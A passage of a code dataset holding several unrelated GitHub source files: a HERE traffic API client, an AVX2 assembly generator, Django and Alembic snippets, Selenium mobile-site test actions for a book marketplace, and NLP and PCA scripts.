xml_response:\n if('fc' in road.attrib):\n fc=int(road.attrib['fc'])\n if('cn' in road.attrib):\n cn=float(road.attrib['cn'])\n if('su' in road.attrib):\n su=float(road.attrib['su'])\n if('sp' in road.attrib):\n sp=float(road.attrib['sp'])\n if('jf' in road.attrib):\n jf=float(road.attrib['jf'])\n if('ff' in road.attrib):\n ff=float(road.attrib['ff'])\n if('de' in road.attrib):\n de=(road.attrib['de'])\n if('qd' in road.attrib):\n qd=(road.attrib['qd'])\n \n # split road information into individual latitude/longitude arrays based on road shape\n # fc is highways and major roadways. CN is confidence in real-time traffic flow information (max 1). At least 70%.\n if((fc<=5) and (cn>=0.7)):\n\n # road shapes by lat/lon coordinates\n shps=html_response.find_all(\"shp\")\n\n for j in range(0,len(shps)):\n latlong=shps[j].text.replace(',',' ').split()\n #loc_list=[]\n la=[]\n lo=[]\n su1=[]\n ff1=[]\n sp1=[]\n jf1=[]\n qd1 = []\n name=[]\n\n for i in range(0,int(len(latlong)/2)):\n # organized as pairs (lat , lon) therefore split by lat/lon values. \n loc_list_hv.append([float(latlong[2*i]),float(latlong[2*i+1]),float(su),float(ff)])\n la.append(float(latlong[2*i]))\n lo.append(float(latlong[2*i+1]))\n su1.append(float(su))\n ff1.append(float(ff))\n sp1.append(float(sp))\n jf1.append(float(jf))\n name.append(de)\n qd1.append(qd)\n lats.append(la)\n lons.append(lo)\n speed_uncapped.append(np.mean(su1))\n speed_capped.append(np.mean(sp1))\n jam_factor.append(np.mean(jf1))\n free_flow_spd.append(np.mean(ff1))\n names.append(str(de))\n direction.append(qd1[0])\n \n return names, direction, lats, lons, speed_capped ,speed_uncapped, free_flow_spd, jam_factor\n\n def incident_report(self):\n ''' Returns incident type (construction, roadwork, accident, etc) along with coordinates of the incident location and the roads affected.\n '''\n # call incident response \n response = self._connect_incident_reports()\n\n # collect the incident description, status, coordinates, and street path coordinates\n descs = response.find_all(\"traffic_item_type_desc\")\n stat = response.find_all(\"traffic_item_status_short_desc\")\n point_lat = response.find_all(\"latitude\")\n point_lon = response.find_all(\"longitude\")\n shps = response.find_all(\"shapes\")\n\n # predefine variables\n lats=[]\n lons=[]\n latlong = []\n descriptions = []\n status = []\n latitude = []\n longitude = []\n\n # loop and collect the incident information for each case\n for j in range(0,len(shps)):\n latlong=shps[j].text.replace(',',' ').split()\n desc = descs[j].text\n stats = stat[j].text\n point_lats = point_lat[j].text\n point_lons = point_lon[j].text\n la=[]\n lo=[]\n # remove combined latlon values that are duplicates and incorrectly listed\n [latlong.remove(x) for x in latlong if len(x)>10]\n\n # assign each lat and lon point\n for i in range(0,int(len(latlong)/2)):\n la.append(float(latlong[2*i]))\n lo.append(float(latlong[2*i+1])) \n \n # append the information into lists \n lats.append(la)\n lons.append(lo)\n descriptions.append(desc) \n status.append(stats) \n latitude.append(point_lats) \n longitude.append(point_lons) \n\n return descriptions, status, latitude, longitude, lats, lons\n\n def generate_traffic_csv(self, outdir):\n '''This function generates a CSV containing traffic variables for each road segment in the specified bbox.\n Please specify an out directory.\n '''\n # call variables from traffic flow function\n names, qd, lats, lons, speed_capped ,speed_uncapped, free_flow_spd, jam_factor = self.traffic_flow()\n\n # store variables in dataframe\n traffic_df = pd.DataFrame({\"road_name\": names, \"direction\":qd,\"lats\":lats, \"lons\":lons, \"sp\":speed_capped, \"su\":speed_uncapped,\"ffs\":free_flow_spd, \"jf\":jam_factor})\n traffic_df.sp = traffic_df.sp.round(0)\n traffic_df.su = traffic_df.su.round(0)\n traffic_df.ffs = traffic_df.ffs.round(0)\n\n # create CSV file containing the variables\n traffic_df.to_csv(f\"{outdir}/oxford_traffic_{self.timestamp}.csv\")\n\n def generate_incident_csv(self, outdir):\n '''This function generates a CSV containing incident variables for each road segment in the specified bbox.\n Please specify an out directory.\n '''\n # call variables from incident report function\n descriptions, status, latitude, longitude, lats0, lons0 = self.incident_report()\n\n # store variables in dataframe\n incident_df = pd.DataFrame({\"status\":status, \"desc\":descriptions, \"point_lat\":latitude, \"point_lon\":longitude,\n \"lats\":lats0, \"lons\":lons0})\n\n # create CSV file containing the variables\n incident_df.to_csv(f\"{outdir}/oxford_incident_{self.timestamp}.csv\")\n\n\n\n\n","repo_name":"ldicarlo1/development_of_traffic_model_for_Oxford","sub_path":"classes/HERE_Traffic_API.py","file_name":"HERE_Traffic_API.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"40487566452","text":"import sys\n\nL = 8\n\ndef ffs(i):\n if i == 0:\n return -1\n k = 0\n while i & 0x0001 == 0:\n k += 1\n i >>= 1\n return k\n\ndef idxq(i, j):\n assert i < j\n return i + j * (j - 1) // 2\n\n\nprint(\"\"\"\n################################################################################\n# This file was auto-generated by {script}\n# The loop is unrolled {unroll} times\n################################################################################\n\"\"\".format(script=sys.argv[0], unroll=2**L))\n\nprint(\"\"\"\n# the System V AMD64 ABI says that :\n# A) The first six integer or pointer arguments are passed in registers RDI, RSI, RDX, RCX, R8, R9\n# B) we should preserve the values of %rbx, %rbp, %r12...%r15 [callee-save registers]\n# C) We will receive the arguments of the function in registers :\n# Fq in %rdi\n# Fl in %rsi\n# alpha in %rdx\n# beta in %rcx\n# gamma in %r8\n# D) we return the mask in %rax\n\n# no need to save the callee-save registers (we do not touch them)\n# Load the 13 most used values into %ymm0-%ymm12\n# %ymm15 is pinned to zero\n# %ymm14 is used for temporary storage (could be dispensed with)\n# %ymm13 contains the mask\n\n# we may still use %9, %r10 and %r11\n# %r11 contains the comparison output mask \n# %r9 and %r10 are available\n\n# This uses only \"light\" AVX2 instructions (no FP, no MUL). But cores runs at \"AVX2\" speed.\n# Scheduling on Haswell : each step is 4 instructions ;\n# three steps send 4 uops to ports 0,1,5 (in the best case)\n# three steps thus take at least 4 cycles\n# peak performance is then 16x3 candidates in 4 cycles --> 12 candidates/cycle\n# \n# Measured : 5.75 cycles for three steps without hyperthreading\n# Measured : 4.45 cycles for three steps with hyperthreading\n#\n# This is a 35% speedup wrt the non-batch version. Even with 10% additionnal work afterwards, there is a clear gain.\n\n### extern u32 feslite_avx2_asm_enum_batch(const __m256i * Fq, __m256i * Fl, u64 alpha, u64 beta, u64 gamma)\n\n.text\n.p2align 5\n\n.globl feslite_avx2_asm_enum_batch\nfeslite_avx2_asm_enum_batch:\n\n# multiply alpha, beta, gamma by 32\nshlq $5, %rdx\nshlq $5, %rcx\nshlq $5, %r8\n\nvpxor %ymm15, %ymm15, %ymm15 # set %ymm15 to always-zero\nvpxor %ymm13, %ymm13, %ymm13 # initialize acc (%ymm13) to zero\n\nmovq %r9, %rax # prepare the return value\n\"\"\")\n\nFl = {}\nFl[0] = \"%ymm0\" # 1\nFl[1] = \"%ymm1\" # 1/2\nFl[2] = \"%ymm2\" # 1/4\nFl[3] = \"%ymm3\" # 1/8\nFl[4] = \"%ymm4\" # 1/16\nFl[5] = \"%ymm5\" # 1/32\nFl[6] = \"%ymm6\" # 1/64\n\nFq = {}\nFq[idxq(0, 1)] = \"%ymm7\" # 1/4\nFq[idxq(0, 2)] = \"%ymm8\" # 1/8\nFq[idxq(1, 2)] = \"%ymm9\" # 1/8\nFq[idxq(0, 3)] = \"%ymm10\" # 1/16\nFq[idxq(1, 3)] = \"%ymm11\" # 1/16\nFq[idxq(2, 3)] = \"%ymm12\" # 1/16\n\nassert Fl[0] == \"%ymm0\"\n\ndef output_comparison(i, between_cmp_or=None):\n # before the XORs, the comparison\n print('vpcmpeqd %ymm0, %ymm15, %ymm15'.format())\n if between_cmp_or:\n print(between_cmp_or)\n print('vpor %ymm15, %ymm13, %ymm13')\n\nstats = {'reg/reg': 0, 'mem/reg': 0, 'mem/mem': 0}\n\ndef compute_update(i, a, b):\n # There are 3 possible cases :\n # 1a. Fq in register, Fl in register\n # 1b. Fq in memory, Fl in register\n # 2. Fq in memory, Fl in memory\n if a in Fl:\n if b in Fq: # reg / reg\n stats['reg/reg'] += 1\n xor1 = \"vpxor {src}, {dst}, {dst}\".format(src=Fq[b], dst=Fl[a])\n elif Fq_memref is None: # mem / reg\n stats['mem/reg'] += 1\n xor1 = \"vpxor {offset}(%rdi), {dst}, {dst}\".format(offset=32*b, dst=Fl[a])\n else: # mem(alpha) / reg\n stats['mem/reg'] += 1\n xor1 = \"vpxor {src}, {dst}, {dst}\".format(src=Fq_memref, dst=Fl[a])\n xor2 = \"vpxor {src}, %ymm0, %ymm0\".format(src=Fl[a])\n return (xor1, xor2)\n\n else: # (a not in Fl)\n stats['mem/mem'] += 1\n assert b not in Fq\n xor1a = \"vmovdqa {offset}(%rsi), %ymm14\".format(offset=32*a) # load Fl[a]\n if Fq_memref is None: \n xor1b = \"vpxor {offset}(%rdi), %ymm14, %ymm14\".format(offset=32*b)\n else:\n xor1b = \"vpxor {src}, %ymm14, %ymm14\".format(src=Fq_memref)\n xor1c = \"vmovdqa %ymm14, {offset}(%rsi)\".format(offset=32*a) # store Fl[a]\n xor2 = \"vpxor %ymm14, %ymm0, %ymm0\"\n return (\"\\n\".join([xor1a, xor1b, xor1c]), xor2)\n\n###################\"\"\n\nprint( \"# load the most-frequently used values into vector registers\" )\nfor i, reg in Fl.items():\n print(\"vmovdqa {offset}(%rsi), {reg} ## {reg} = Fl[{i}]\".format(offset=i*32, reg=reg, i=i))\nprint()\nfor x, reg in Fq.items():\n print(\"vmovdqa {offset}(%rdi), {reg} ## {reg} = Fq[{idx}]\".format(offset=x*32, reg=reg, idx=x))\nprint()\n\nalpha = 0\nfor i in range((1 << L) - 1):\n ########################## UNROLLED LOOP #######################################\n idx1 = ffs(i + 1) \n idx2 = ffs((i + 1) ^ (1 << idx1))\n a = idx1 + 1 # offset dans Fl\n Fq_memref = None\n if idx2 == -1:\n Fq_memref = \"{offset}(%rdi, %rdx)\".format(offset=32*alpha)\n b = \"alpha + {}\".format(alpha)\n alpha += 1\n else:\n assert idx1 < idx2\n b = idxq(idx1, idx2) # offset dans Fq\n\n print()\n print('##### step {:3d} : Fl[0] ^= (Fl[{}] ^= Fq[{}])'.format(i, a, b))\n print()\n xor1, xor2 = compute_update(i, a, b)\n output_comparison(i)\n print(xor1)\n print(xor2)\n print()\n\n####### ne pas oublier le dernier tour special\nprint('#############################')\nprint('# end of the unrolled chunk #')\nprint('#############################')\nprint()\nprint(\"# Save the Fl[1:] back to memory\")\nfor i, reg in Fl.items():\n if i == 0:\n continue\n print(\"vmovdqa {reg}, {offset:2d}(%rsi) #Fl[{i}] <-- {reg}\".format(offset=i*32, reg=reg, i=i))\nprint()\nprint('##### special last step {:3d} : Fl[0] ^= (Fl[beta] ^= Fq[gamma])'.format((1 << L) - 1))\nprint()\noutput_comparison((1 << L) - 1)\nprint(\"vmovdqa (%rsi, %rcx), %ymm14\") # load Fl[beta]\nprint(\"vpxor (%rdi, %r8), %ymm14, %ymm14\") # xor Fq[gamma]\nprint(\"vmovdqa %ymm14, (%rsi, %rcx)\") # store Fl[beta]\nprint(\"vpxor %ymm14, %ymm0, %ymm0\")\nprint()\nprint(\"# Save Fl[0] back to memory\")\nprint(\"vmovdqa %ymm0, (%rsi) #Fl[0] <-- %ymm0\")\nprint()\nprint(\"# Save acc back to memory\")\nprint(\"vpmovmskb %ymm13, %eax #return value <-- %ymm13\")\n\nprint('ret')\nprint()\nprint(\"####################################################\")\nprint(\"# Stats\")\nprint(\"# reg / reg : {}\".format(stats['reg/reg']))\nprint(\"# mem / reg : {}\".format(stats['mem/reg']))\nprint(\"# mem / mem : {}\".format(stats['mem/mem']))\n","repo_name":"cbouilla/libfes-lite","sub_path":"src/avx2_codegen_batch.py","file_name":"avx2_codegen_batch.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"10488280318","text":"from django.test import override_settings\n\nfrom ..context_processors import env\n\n\n@override_settings(SENTRY_DSN=\"https://example.com\")\ndef test_env(rf):\n result = env(rf.get(\"/\"))\n\n assert \"GLOBALS\" in result\n assert \"SENTRY_DSN\" in result[\"GLOBALS\"]\n","repo_name":"SFDO-Tooling/sfdo-template","sub_path":"{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/tests/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"5490607330","text":"from unidecode import unidecode\n\n\nclass Person:\n def __init__(\n self,\n first_name,\n surname,\n second_name=\"\",\n address=\"\",\n email=\"\",\n acquaintances=None,\n ):\n self.first_name = first_name\n self.surname = surname\n self.second_name = second_name\n self.email = email or unidecode(first_name + surname).lower() + \"@gmail.com\"\n self.address = address\n self.acquaintances = [] if acquaintances is None else acquaintances\n\n def __eq__(self, other):\n if self.first_name == other.first_name and self.surname == other.surname:\n return True\n return False\n\n def add_acquaintance(self, acquaintance):\n self.acquaintances.append(acquaintance)\n return self.acquaintances\n\n def del_acquaintance(self, acquaintance):\n if acquaintance in self.acquaintances:\n self.acquaintances.remove(acquaintance)\n return self.acquaintances\n","repo_name":"alexgrck/Python-Fundamentals","sub_path":"2_Object-oriented_programming/1_EASY/person/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36839267453","text":"\"\"\"a new migration\n\nRevision ID: ff7eb255fc5c\nRevises: a2d2cd05fd0f\nCreate Date: 2022-05-19 14:18:31.963414\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ff7eb255fc5c'\ndown_revision = 'a2d2cd05fd0f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('meals', sa.Column('meal_name', sa.String(length=255), nullable=True))\n op.drop_column('meals', 'column')\n op.drop_column('meals', 'meal')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('meals', sa.Column('meal', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n op.add_column('meals', sa.Column('column', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n op.drop_column('meals', 'meal_name')\n # ### end Alembic commands ###\n","repo_name":"edah-hub/foodAirline","sub_path":"migrations/versions/ff7eb255fc5c_a_new_migration.py","file_name":"ff7eb255fc5c_a_new_migration.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"43313632135","text":"from django.shortcuts import render\nfrom django.views import View\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nimport pickle\nimport numpy as np\n\n\n# Create your views here.\nnltk.download('wordnet')\n\n\nafile = open('/home/sergio/Topicos/Corpusgoogle/corpusgoogledjango/PROJECT/APP/db03', 'rb')\ndb = pickle.load(afile)\nafile.close()\n\ndef takeSecond(elem):\n return elem[1]\n\ndef createBooleanArray(positions, size):\n vec = np.zeros(size, dtype=bool)\n for p in positions:\n # print(p)\n vec[p] = 1\n return vec\n\n\ndef compareVectors(word, theDict, size):\n positions = theDict[word]\n keys = theDict.keys()\n vect1 = createBooleanArray(positions, size)\n\n allPorcentages = []\n\n for k in keys:\n pos = theDict[k]\n vect2 = createBooleanArray(pos, size)\n\n # vecRes = np.invert(np.logical_xor(vect1,vect2))\n # concur = np.count_nonzero(vecRes)\n # result = concur/size\n result = (np.logical_and(vect1, vect2)).sum() / float((np.logical_or(vect1, vect2)).sum())\n allPorcentages.append((k, result))\n allPorcentages.sort(key=takeSecond, reverse=True)\n\n return allPorcentages\n\nclass Index(View):\n template_name = \"index.html\"\n\n lemmatizer = WordNetLemmatizer()\n context = {}\n\n def post(self, request):\n text = request.POST.get('my_textarea')\n self.context['txt'] = text\n # print(cleanner(tokens))\n actualword = text.lower()\n lemword = self.lemmatizer.lemmatize(actualword, pos=\"v\")\n if(actualword == lemword):\n lemword = self.lemmatizer.lemmatize(lemword, pos=\"n\")\n\n all = compareVectors(text, db, 500000)\n\n self.context['answer'] = all[0:100]\n # print(stems)\n\n return render(request, self.template_name, self.context)\n\n def get(self, request):\n return render(request, self.template_name)","repo_name":"sergiorvs/corpusgoogle","sub_path":"corpusgoogledjango/PROJECT/APP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25573915987","text":"from MobileTest.Page.MSitePage import MSitePage\nfrom Module import Uri, UserInfo\nfrom Public.Toolkit import Toolkit\nimport time\n\n\nclass MSiteAction:\n def __init__(self):\n self.page = MSitePage()\n self.temp_data = ''\n\n # 搜索\n def search(self, search_content, search_type):\n self.page.go_to(Uri.MSearchPage)\n self.page.wait_until_clickable(self.page.search_submit_css)\n if search_type == 'book':\n self.page.book_search_tab.click()\n if search_type == 'auction':\n self.page.auction_search_tab.click()\n if search_type == 'shop':\n self.page.shop_search_tab.click()\n self.page.search_txt.send_keys(search_content)\n self.page.search_submit_btn.click()\n\n # 获取搜索结果\n def get_search_result(self, search_type):\n results = []\n if search_type == 'book':\n for result in self.page.book_search_result:\n results.append(result.text)\n if search_type == 'auction':\n for result in self.page.auction_search_result:\n results.append(result.text)\n if search_type == 'shop':\n for result in self.page.shop_search_result:\n results.append(result.text)\n return results\n\n # 添加图书到收藏夹\n def add_book_to_favorite(self):\n self.page.go_to(Uri.MBookDetailPage)\n self.page.book_fav_btn.click()\n\n # 删除收藏夹内的图书\n def delete_book_in_favorite(self):\n for del_btn in self.page.del_fav_book_btn:\n del_btn.click()\n time.sleep(1)\n\n # 验证图书收藏夹\n def verify_book_fav(self, is_exist):\n result = False\n self.page.go_to(Uri.FavMProdPage)\n time.sleep(1)\n self.page.wait_until_not_clickable(self.page.loading_css)\n if is_exist is True:\n for book_name in self.page.fav_books_name:\n if book_name.text == '测试用书请勿购买':\n result = True\n if is_exist is False:\n if self.page.no_data.text == '暂无数据':\n result = True\n return result\n\n # 添加店铺到收藏夹\n def add_shop_to_favorite(self):\n self.page.go_to(Uri.MShopPage)\n self.page.shop_fav_btn.click()\n\n # 删除收藏夹内的店铺\n def delete_shop_in_favorite(self):\n for del_btn in self.page.del_fav_shop_btn:\n del_btn.click()\n time.sleep(1)\n\n # 验证店铺收藏夹\n def verify_shop_fav(self, is_exist):\n result = False\n self.page.go_to(Uri.FavMShopPage)\n time.sleep(1)\n self.page.wait_until_not_clickable(self.page.loading_css)\n if is_exist is True:\n for shop_name in self.page.fav_shops_name:\n if shop_name.text == UserInfo.User3 + '的书店':\n result = True\n if is_exist is False:\n if self.page.no_data.text == '暂无数据':\n result = True\n return result\n\n # 添加拍品到收藏夹\n def add_auction_to_favorite(self):\n self.page.go_to(Uri.MAuctionDetailPage)\n self.page.wait_until_clickable(self.page.auction_fav_css)\n self.page.auction_fav_btn.click()\n\n # 删除拍品到收藏夹\n def delete_auction_to_favorite(self):\n for del_btn in self.page.del_fav_auction_btn:\n del_btn.click()\n time.sleep(1)\n\n # 验证拍卖收藏夹\n def verify_auction_fav(self, is_exist):\n result = False\n self.page.go_to(Uri.FavMAuctionPage)\n time.sleep(2)\n if is_exist is True:\n for shop_name in self.page.fav_auction_name:\n if '测试拍卖请勿购买' in shop_name.text:\n result = True\n if is_exist is False:\n if self.page.no_data.text == '暂无数据':\n result = True\n return result\n\n # 登录\n def login(self,user='user2'):\n self.page.go_to(Uri.MLoginPage)\n if user == 'user1':\n self.page.login_name_txt.send_keys(UserInfo.User1)\n if user == 'user2':\n self.page.login_name_txt.send_keys(UserInfo.User2)\n self.page.login_pwd_txt.send_keys(UserInfo.PwdLogin)\n self.page.login_submit_btn.click()\n time.sleep(2)\n\n # 修改登录密码\n def change_login_pwd(self, old, new):\n self.page.go_to(Uri.MChangePwdPage)\n self.page.old_pwd_txt.send_keys(old)\n self.page.new_pwd_txt.send_keys(new)\n self.page.change_pwd_submit_btn.click()\n self.page.wait_until_clickable(self.page.success_msg_css)\n\n # 获取成功提示文本\n def get_success_txt(self):\n return self.page.success_msg.text\n\n # 添加收货地址\n def add_receive_address(self):\n self.page.go_to(Uri.MReceiveAddressPage)\n self.page.wait_until_clickable(self.page.address_submit_css)\n self.page.address_submit_btn.click()\n self.page.receiver_name_txt.send_keys('自动化')\n self.page.receiver_mobile_txt.send_keys('18510291234')\n self.page.receiver_area.click()\n time.sleep(1)\n self.page.receiver_area_confirm_btn.click()\n self.page.receiver_address_txt.send_keys('红厂孔夫子A6')\n self.page.address_submit_btn.click()\n\n # 编辑收货地址\n def edit_receive_address(self):\n self.page.go_to(Uri.MReceiveAddressPage)\n self.page.wait_until_clickable(self.page.edit_address_css)\n self.page.edit_address_btn.click()\n time.sleep(1)\n self.page.address_submit_btn.click()\n\n # 删除收货地址\n def del_receive_address(self):\n self.page.go_to(Uri.MReceiveAddressPage)\n self.page.wait_until_clickable(self.page.address_submit_css)\n for btn in self.page.del_address_btn:\n btn.click()\n self.page.wait_until_clickable(self.page.confirm_css)\n self.page.confirm_btn.click()\n time.sleep(1)\n\n # 获取提示框内文本\n def get_tip_view_txt(self):\n self.page.wait_until_clickable(self.page.tip_view_css)\n return self.page.tip_view.text\n\n # 将图书加到购物车\n def add_book_to_cart(self):\n self.page.go_to(Uri.MBookDetailPage)\n self.page.add_cart_btn.click()\n\n # 去购物车结算\n def settle_in_cart(self):\n self.page.go_to(Uri.MCartPage)\n self.page.wait_until_clickable(self.page.cart_item_css)\n self.page.check_all_rdo.click()\n self.page.go_to_pay_btn.click()\n self.page.wait_until_clickable(self.page.order_book_box_css)\n self.page.create_order_btn.click()\n\n # 获取生成订单后的文本\n def get_submit_result_txt(self):\n self.page.wait_until_clickable(self.page.submit_order_result_css)\n time.sleep(1)\n return self.page.submit_order_result.text\n\n # 进行常规竞价\n def bid(self):\n self.page.go_to(Uri.MAuctionDetailPage)\n self.page.wait_until_clickable(self.page.pop_bid_win_css)\n self.page.pop_bid_win_btn.click()\n time.sleep(1)\n self.page.bid_btn.click()\n\n # 设置代理价\n def set_agent(self):\n self.page.go_to(Uri.MAuctionDetailPage)\n self.page.pop_bid_win_btn.click()\n time.sleep(1)\n self.page.agent_bid_tab.click()\n time.sleep(1)\n self.page.agent_bid_btn.click()\n\n # 跳转到联系人列表页\n def go_to_contact_page(self):\n self.page.go_to(Uri.MContactPage)\n\n # 搜索用户\n def search_user(self, user):\n if user == 'user1':\n self.page.search_friend_txt.send_keys(UserInfo.User1)\n if user == 'user2':\n self.page.search_friend_txt.send_keys(UserInfo.User2)\n self.page.search_user_btn.click()\n\n # 发送消息\n def send_message(self):\n self.temp_data = Toolkit.get_random_value()\n self.page.search_user_result.click()\n time.sleep(1)\n self.page.send_message_txt.send_keys(self.temp_data)\n self.page.send_btn.click()\n\n # 验证收到消息\n def verify_message_received(self):\n self.go_to_contact_page()\n self.search_user('user1')\n self.page.search_user_result.click()\n time.sleep(1)\n result = False\n for message in self.page.message_collection:\n if message.text == self.temp_data:\n result = True\n return result\n\n # 买家评价订单/交易\n def eval(self, user_type, eval_type):\n if user_type == 'buyer':\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n if eval_type == 'order':\n self.page.go_to(Uri.MBuyerEvalOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n if eval_type == 'trade':\n self.page.go_to(Uri.MBuyerEvalTradePage)\n self.page.wait_until_clickable(self.page.trade_action_css)\n self.page.trade_action_btn.click()\n if user_type == 'seller':\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User3, UserInfo.PwdLogin))\n self.page.go_to(Uri.MSellerEvalOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n\n self.page.eval_content_txt.send_keys('automation test')\n self.page.submit_eval_btn.click()\n\n # 确认收货订单\n def receive_order(self):\n self.page.go_to(Uri.MReceivedBookOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n time.sleep(1)\n self.page.book_confirm_btn.click()\n\n # 订单发货\n def send_order(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User3, UserInfo.PwdLogin))\n self.page.go_to(Uri.MSendBookOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n self.page.wait_until_clickable(self.page.book_confirm_css)\n self.page.send_order_num_txt.send_keys('12345678')\n self.page.book_confirm_btn.click()\n\n # 确认交易订单\n def receive_trade(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MReceivedAuctionTradePage)\n self.page.wait_until_clickable(self.page.trade_action_css)\n self.page.trade_action_btn.click()\n time.sleep(1)\n self.page.trade_confirm_btn.click()\n time.sleep(1)\n\n # 支付订单\n def pay_order(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MBuyerPayOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n self.page.wait_until_clickable(self.page.pay_step2_css)\n time.sleep(1)\n self.page.pay_step2_btn.click()\n time.sleep(1)\n self.page.pay_pass_txt.send_keys(UserInfo.PwdPay)\n self.page.pay_step3_btn.click()\n\n # 支付交易\n def pay_trade(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MBuyerPayTradePage)\n self.page.wait_until_clickable(self.page.trade_action_css)\n self.page.trade_action_btn.click()\n self.page.wait_until_clickable(self.page.pay_step1_css)\n time.sleep(1)\n self.page.pay_step1_btn.click()\n self.page.wait_until_clickable(self.page.pay_step2_css)\n time.sleep(1)\n self.page.pay_step2_btn.click()\n time.sleep(1)\n self.page.pay_pass_txt.send_keys(UserInfo.PwdPay)\n self.page.pay_step3_btn.click()\n\n # 获取支付成功信息\n def get_pay_success_msg(self):\n self.page.wait_until_clickable(self.page.pay_success_css)\n return self.page.pay_success_msg.text\n\n # 添加提现账号\n def add_cash_account(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MCashAccountPage)\n self.page.add_cash_account_btn.click()\n self.page.alipay_chk.click()\n self.page.alipay_txt.send_keys('fish3@126.com')\n self.page.submit_btn_3.click()\n\n # 进行提现操作\n def do_cash_back(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MCashBackPage)\n self.page.cash_txt.send_keys('2')\n time.sleep(1)\n self.page.submit_btn_1.click()\n self.page.cash_back_pass_txt.send_keys(UserInfo.PwdPay)\n time.sleep(1)\n self.page.submit_btn_2.click()\n\n # 获取提现成功提示\n def get_fund_success_msg(self):\n self.page.wait_until_clickable(self.page.fund_success_css)\n return self.page.fund_success_msg.text\n\n # 删除提现账号\n def delete_cash_account(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MCashAccountPage)\n for btn in self.page.del_cash_account_btn:\n btn.click()\n self.page.wait_until_clickable(self.page.confirm_css)\n self.page.confirm_btn.click()\n time.sleep(1)\n\n # 获取书店收货后成功提示\n def get_book_receive_success_msg(self):\n self.page.wait_until_clickable(self.page.book_receive_success_css)\n return self.page.book_receive_success_msg.text\n\n # 获取拍卖收货后成功提示\n def get_auction_receive_success_msg(self):\n self.page.wait_until_clickable(self.page.auction_receive_success_css)\n return self.page.auction_receive_success_msg.text\n\n # 进行转账操作\n def do_fund_transfer(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User3, UserInfo.PwdLogin))\n self.page.go_to(Uri.MTransferPage)\n self.page.trans_fund_account_txt.send_keys(UserInfo.FundID1)\n self.page.trans_fund_money_txt.send_keys('1')\n self.page.submit_btn_1.click()\n self.page.trans_pay_password.send_keys(UserInfo.PwdPay)\n self.page.submit_btn_2.click()\n","repo_name":"diaoyinlong/automation","sub_path":"MobileTest/Action/MSiteAction.py","file_name":"MSiteAction.py","file_ext":"py","file_size_in_byte":14416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71719242556","text":"from pca_dim_reduce import load_data, try_PCA_with_torch\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef read_pattern_index(path):\n pattern_inds = []\n with open(path, newline='') as ind_f:\n read_lines = ind_f.readlines()\n for j, l in enumerate(read_lines):\n d_l = l.split(\";\")\n print(d_l)\n data_line = [int(i) for i in d_l[1:-1]]\n pattern_inds.append(data_line)\n\n return pattern_inds\n\n\nif __name__ == '__main__':\n x_train, y_train = load_data(data_path=\"/srv/yanke/PycharmProjects/HTScreening/data/dataset/train_set.csv\",\n label_path=\"/srv/yanke/PycharmProjects/HTScreening/data/dataset/train_label.csv\")\n pattern_indexes = read_pattern_index(path=\"/srv/yanke/PycharmProjects/HTScreening/Methods/PCA/results/pca_with_name/train/pattern-slected.txt\")\n _, new_data = try_PCA_with_torch(x_train)\n print(\"number of data\", x_train.shape[0])\n #fig = plt.figure()\n #color = plt.cm.Set1(0)\n \"\"\"\n #draw the data after pca\n for p in pattern_indexes:\n for p_i in p:\n plt.scatter(new_data[p_i, 0], new_data[p_i, 1], s=1, color=color) # , label=\"all_data\")\n 